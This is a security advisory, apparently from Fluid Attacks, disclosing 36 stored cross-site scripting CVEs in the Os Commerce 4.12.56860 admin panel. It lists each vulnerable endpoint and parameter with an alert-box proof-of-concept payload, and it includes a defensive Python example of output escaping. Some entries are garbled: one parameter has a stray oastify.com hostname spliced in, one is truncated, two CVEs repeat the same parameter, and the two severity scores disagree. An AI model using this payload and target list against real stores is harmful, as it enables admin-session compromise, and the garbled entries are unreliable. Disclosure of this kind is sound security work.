Os Commerce - Cross Site Scripting Stored (XSS)

8,5

High

Discovered by 

Takao Sato

Offensive Team, Fluid Attacks

Summary

Full name

Os Commerce 4.12.56860 - Cross Site Scripting (XSS)

Code name

State

Public

Release date

September 29, 2023

Affected product

Os Commerce

Affected version(s)

4.12.56860

Vulnerability name

Cross Site Scripting Stored

Vulnerability type

Remotely exploitable

Yes

CVSS v3.1 vector string

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS v3.1 base score

8.1

Exploit available

Yes

Description

Os Commerce is an e-commerce platform that enables businesses to create online stores and manage product listings, orders, and more. It offers various features to streamline online selling.

Vulnerability

Os Commerce is currently susceptible to a stored Cross-Site Scripting (XSS) vulnerability in a number of administration-panel parameters. This vulnerability allows attackers to inject malicious scripts into specific parameters of the application, which are stored and later rendered, potentially leading to unauthorized script execution within a user's web browser.

Exploiting XSS (Cross Site Scripting) vulnerabilities can have severe consequences for web applications and their users. This type of vulnerability occurs when input data from users is not properly validated and sanitized, allowing malicious actors to inject scripts that can be executed by other users visiting the same web page.

Exploitation

In this scenario, we have identified the following URLs and their corresponding vulnerable parameters, each of which can be manipulated to execute a common malicious payload:

"><script>alert(13)</script>

In each of the following endpoints the payload is executed; the affected URL and the vulnerable parameter are listed for every assigned CVE:

  1. CVE-2023-43702: /admin/orders/tracking-save - Vulnerable Parameter: tracking_number

  2. CVE-2023-43703: /admin/editor/show-basket?orders_id=4&currentCart=cart%7C1-35025&uprid=29&action=edit_product - Vulnerable Parameter: product_info[][name]

  3. CVE-2023-43704: /admin/design/theme-title - Vulnerable Parameter: title

  4. CVE-2023-43705: /admin/texts/submit?translation_key=%23%23BILLING_ADDRESS%23%23&translation_entity=keys&row=0 - Vulnerable Parameter: translation_value[1]

  5. CVE-2023-43706: /admin/email/templates-save - Vulnerable Parameter: email_templates_key

  6. CVE-2023-43707: /admin/catalog-pages/edit?id=0&platform_id=1&parent_id=0 - Vulnerable Parameter: CatalogsPageDescriptionForm[1][name]

  7. CVE-2023-43708: /admin/modules/save?set=payment - Vulnerable Parameter: configuration_title1

  8. CVE-2023-43709: /admin/modules/save?set=payment - Vulnerable Parameter: configuration_title1

  9. CVE-2023-43710: /admin/modules/save?set=shipping - Vulnerable Parameter: configuration_title[1][MODULE_SHIPPING_PERCENT_TEXT_TITLE]

  10. CVE-2023-43711: /admin/adminmembers/adminsubmit - Vulnerable Parameter: admin_firstname

  11. CVE-2023-43712: /admin/adminfiles/submit - Vulnerable Parameter: access_levels_name

  12. CVE-2023-43713: /admin/admin-menu/add-submit - Vulnerable Parameter: title

  13. CVE-2023-43714: /admin/configuration/saveparam - Vulnerable Parameter: SKIP_CART_PAGE_TITLE[1]

  14. CVE-2023-43715: /admin/configuration/saveparam - Vulnerable Parameter: ENTRY_FIRST_NAME_MIN_LENGTH_TITLE[1]

  15. CVE-2023-43716: /admin/configuration/saveparam - Vulnerable Parameter: MAX_DISPLAY_NEW_PRODUCTS_TITLE[1]

  16. CVE-2023-43717: /admin/configuration/saveparam - Vulnerable Parameter: MSEARCH_HIGHLIGHT_ENABLE_TITLE[1]

  17. CVE-2023-43718: /admin/configuration/saveparam - Vulnerable Parameter: MSEARCH_ENABLE_TITLE[1]

  18. CVE-2023-43719: /admin/configuration/saveparam - Vulnerable Parameter: SHIPPING_GENDER_TITLE[1]

  19. CVE-2023-43720: /admin/configuration/saveparam - Vulnerable Parameter: BILLING_GENDER_TITLE[1]

  20. CVE-2023-43721: /admin/configuration/saveparam - Vulnerable Parameter: PACKING_SLIPS_SUMMARY_TITLE[1]

  21. CVE-2023-43722: /admin/orders_status_groups/save?orders_status_groups_id=5 - Vulnerable Parameter: orders_status_groups_name[1]

  22. CVE-2023-43723: /admin/orders_status/save?type_id=2 - Vulnerable Parameter: orders_status_name[1]

  23. CVE-2023-43724: /admin/orders-comment-template/edit - Vulnerable Parameter: derb6zmklgtjuhh2cn5chn2qjbm2st gmfa4.oastify.comscription[1][name]

  24. CVE-2023-43725: /admin/orders_products_status/save?orders_products_status_id=50 - Vulnerable Parameter: orders_products_status_name_long[1]

  25. CVE-2023-43726: /admin/orders_products_status_manual/save?orders_products_status_manual_id=0 - Vulnerable Parameter: orders_products_status_manual_name_long[1]

  26. CVE-2023-43727: /admin/stock-indication/save?stock_indication_id=11 - Vulnerable Parameter: stock_indication_text%5B1%5D

  27. CVE-2023-43728: /admin/stock-delivery-terms/save?stock_delivery_terms_id=1 - Vulnerable Parameter: stock_delivery_terms_text%5B1%5

  28. CVE-2023-43729: /admin/xsell-types/save?xsell_type_id=0 - Vulnerable Parameter: xsell_type_name%5B1%5D

  29. CVE-2023-43730: /admin/countries/save?countries_id=0 - Vulnerable Parameter: countries_name[1]

  30. CVE-2023-43731: /admin/zones/save?zones_id=0 - Vulnerable Parameter: zone_name

  31. CVE-2023-43732: /admin/tax_classes/save?tax_classes_id=0 - Vulnerable Parameter: tax_class_title

  32. CVE-2023-43733: /admin/tax_rates/save?tax_rates_id=13 - Vulnerable Parameter: company_address

  33. CVE-2023-43734: /admin/languages/save?languages_id=2&action=save - Vulnerable Parameter: name

  34. CVE-2023-43735: /admin/address-formats/index - Vulnerable Parameter: formats_titles[7]

  35. CVE-2023-5111: /admin/featured-types/save?featured_type_id=0 - Vulnerable Parameter: featured_type_name[1]

  36. CVE-2023-5112: /admin/specials-types/save?specials_type_id=0 - Vulnerable Parameter: specials_type_name[1]

To exploit these vulnerabilities, an attacker with access to the corresponding admin form would only need to submit the respective parameter with the payload shown above:

"><script>alert(13)</script>

Because the value is stored, the script then executes in the browser of any user who later opens the page where the affected field is rendered.
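As an added illustration (not code from the advisory or from Os Commerce), the following Python models the defect behind this class of finding: a stored admin value interpolated raw into an attribute, beside the same template with output encoding applied, and a parser-based check that tells the two apart. The template shape is an assumption; the advisory names only the parameters, not the markup they land in.

```python
import html
from html.parser import HTMLParser

# Payload quoted in the advisory: the leading `">` closes an attribute value
# and its tag, so the <script> element lands in the page body.
ADVISORY_PAYLOAD = '"><script>alert(13)</script>'

# Template shape assumed for this example; the advisory only names the
# parameter (e.g. `title` on /admin/design/theme-title), not the markup.
TEMPLATE = '<input type="text" name="title" value="{value}">'


def render_unsafe(stored_value: str) -> str:
    """Vulnerable pattern: the stored value is interpolated raw into an
    attribute, which is the missing output encoding the advisory describes."""
    return TEMPLATE.format(value=stored_value)


def render_escaped(stored_value: str) -> str:
    """Hardened pattern: encode on output with quote=True so the attribute
    delimiter (") and the angle brackets are all neutralized."""
    return TEMPLATE.format(value=html.escape(stored_value, quote=True))


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags the way a browser's tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def count_script_elements(markup: str) -> int:
    """Return how many live <script> elements the markup contains. For a page
    built from one stored field, 1 or more means the field escaped its
    attribute context, i.e. the stored XSS condition."""
    parser = _ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("escaped", render_escaped)):
        page = render(ADVISORY_PAYLOAD)
        print(f"{label:8s} script elements: {count_script_elements(page)}  {page}")
```

The same parser check can be run over stored admin values in a test suite to confirm a fix: every rendered form must report zero script elements for this payload.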

Evidence of exploitation

The same behavior repeats across every URL and parameter listed above: once the payload is stored in the affected parameter or field, it is executed whenever the value is rendered.

Our security policy

We have reserved the following IDs to refer to this issue from now on: CVE-2023-43702, CVE-2023-43703, CVE-2023-43704, CVE-2023-43705, CVE-2023-43706, CVE-2023-43707, CVE-2023-43708, CVE-2023-43709, CVE-2023-43710, CVE-2023-43711, CVE-2023-43712, CVE-2023-43713, CVE-2023-43714, CVE-2023-43715, CVE-2023-43716, CVE-2023-43717, CVE-2023-43718, CVE-2023-43719, CVE-2023-43720, CVE-2023-43721, CVE-2023-43722, CVE-2023-43723, CVE-2023-43724, CVE-2023-43725, CVE-2023-43726, CVE-2023-43727, CVE-2023-43728, CVE-2023-43729, CVE-2023-43730, CVE-2023-43731, CVE-2023-43732, CVE-2023-43733, CVE-2023-43734, CVE-2023-43735, CVE-2023-5111, CVE-2023-5112.

System Information

  • Version: Os Commerce 4.12.56860

  • Operating System: Windows

Mitigation

There is currently no patch available for this vulnerability.

References

Timeline

Vulnerability discovered

September 22, 2023

Vendor contacted

September 22, 2023

Public disclosure

September 29, 2023
